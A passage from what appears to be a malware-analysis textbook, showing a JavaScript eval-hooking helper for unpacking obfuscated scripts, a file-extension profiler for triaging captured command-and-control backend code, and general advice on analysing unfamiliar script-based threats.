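The same idea of intercepting eval can be sketched in plain JavaScript. This is not how Malzilla itself is implemented; it is only an illustration of the approach, and the captureEvalArguments and sample names are hypothetical. The hook records the argument instead of executing it and restores the original function afterward:

```javascript
// Run a sample with eval replaced by a hook that records its argument.
function captureEvalArguments(runSample) {
  const captured = [];
  const originalEval = globalThis.eval;
  globalThis.eval = (code) => {
    captured.push(String(code)); // keep the deobfuscated layer
    return undefined;            // do not execute it
  };
  try {
    runSample();
  } finally {
    globalThis.eval = originalEval; // always restore the real eval
  }
  return captured;
}

// Hypothetical obfuscated sample: builds "alert(1)" from integers.
function sample() {
  const layer = String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41);
  eval(layer);
}

const layers = captureEvalArguments(sample);
console.log(layers);
```

Because the hook does not execute the captured code, a sample with several nested layers needs the process repeated on each recovered layer. Samples that depend on the return value of eval may also behave differently under this hook.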
Another example of such a tool is the more recent JSDetox project. It aims to facilitate static analysis and handle JavaScript obfuscation techniques. Unlike Malzilla, it is more focused on the Linux environment:
Figure 10.28 – The JSDetox website describing its functionality
Now, let’s talk about the backend code.
Many malware families use some sort of C&C server to receive updates or custom commands from the malicious actor or to exfiltrate stolen data. Getting access to these backend files can give researchers and law enforcement agencies a lot of information about how malware works and who the victims are. Sometimes, it can even lead to the actual people behind the attack! Therefore, properly and promptly analyzing the code obtained from the C&C is an important task that researchers have to face from time to time, so it’s better to be ready!
Once the analyst has access to the code, it makes sense to prepare and prioritize a list of questions to answer. Generally, the following knowledge can be obtained from the backend:
More advanced steps include searching for communication patterns that may help identify future C&Cs. If the HTTPS protocol was used, it may make sense to check where the corresponding certificate came from.
Multiple programming languages can be used to implement a backend. Whether it is PHP, Perl, Python, or something else, you need to correctly identify the programming language and check whether the code is built on an existing framework. The first part of this task can be solved by looking at the corresponding file extensions. For the second part, the configuration files or directories will usually contain the name of the framework used.
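As a rough sketch of this first triage step, the following function counts files per language based on their extensions and looks for a few well-known framework marker files. The profileBackend name, both lookup tables, and the sample file list are assumptions made for this example; the tables are deliberately tiny and would need to be extended for real use:

```javascript
// Illustrative lookup tables; extend them for real use.
const LANGUAGE_BY_EXTENSION = new Map([
  [".php", "PHP"],
  [".pl", "Perl"],
  [".py", "Python"],
]);

// File names that commonly indicate a particular framework or platform.
const FRAMEWORK_HINTS = new Map([
  ["wp-config.php", "WordPress"],
  ["manage.py", "Django"],
  ["artisan", "Laravel"],
]);

// Summarize a list of file paths taken from a backend dump.
function profileBackend(filePaths) {
  const languages = {};
  const frameworks = new Set();
  for (const filePath of filePaths) {
    const name = filePath.split(/[\\/]/).pop();
    const dot = name.lastIndexOf(".");
    const extension = dot > 0 ? name.slice(dot).toLowerCase() : "";
    const language = LANGUAGE_BY_EXTENSION.get(extension);
    if (language) {
      languages[language] = (languages[language] || 0) + 1;
    }
    if (FRAMEWORK_HINTS.has(name)) {
      frameworks.add(FRAMEWORK_HINTS.get(name));
    }
  }
  return { languages, frameworks: [...frameworks] };
}

// Hypothetical file listing.
const profile = profileBackend([
  "panel/index.php",
  "panel/gate.php",
  "panel/wp-config.php",
  "tools/export.py",
]);
console.log(profile);
```

File extensions can be misleading, so the result is only a starting point that should be confirmed by looking at the file contents.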
Installing the corresponding IDE and loading the project there will drastically speed up further analysis as it will facilitate efficient static and dynamic analysis.
In this chapter, we covered the most common examples of languages used nowadays. But what if you encounter something more exotic that you don’t have a ready step-by-step tutorial for? Or what if a new script language becomes increasingly popular, is available on lots of systems, and is, therefore, misused by malicious actors? Don’t panic – we have summarized the ideas that will help you successfully analyze any new threat.
Here is what you should do when analyzing a new threat:
If the script language is compiled, search for tools such as decompilers or disassemblers to make static analysis possible.
Once you can analyze code, the next important step will be figuring out what to focus on.
Reverse engineering is not just an engineering task – often, it requires a certain amount of research and creativity to solve the corresponding challenges.
Usually, the analysis time is limited by circumstances. Therefore, pay particular attention to the functionality that will help answer the questions needed to complete the report. This part might be tricky because, without taking a look at everything, it is difficult to say whether the description is complete or not. Searching for the keywords of functions of interest and checking their references should be a good starting point. After this, it makes sense to check whether any block of code was encrypted, encoded, or loaded externally. Keeping your markup accurate will help you navigate the whole project and allow you to quickly come back later if necessary.
In this chapter, we covered multiple script languages and document macros that are often misused by attackers. We described the motivation behind a malware writer's decision to choose a particular approach. Additionally, we explored ready-to-use recipes for solving challenges specific to each language and summarized what functionality to pay attention to. You also gained a good understanding of various tools that help drastically speed up analysis.
Finally, we covered generic approaches on how to handle malicious code written in virtually any script language that you may encounter. We also discussed the sequence of actions to follow to analyze malicious code efficiently.
After completing this chapter, you can now successfully perform static and dynamic analyses of various scripts, bypass anti-reversing techniques, and understand the core functionality of malware.
In Chapter 11, Dissecting Linux and IoT Malware, we will explore threats that target various Linux-based and IoT systems, learn how to analyze them, and then learn how to extend some of the knowledge you have gained from this chapter.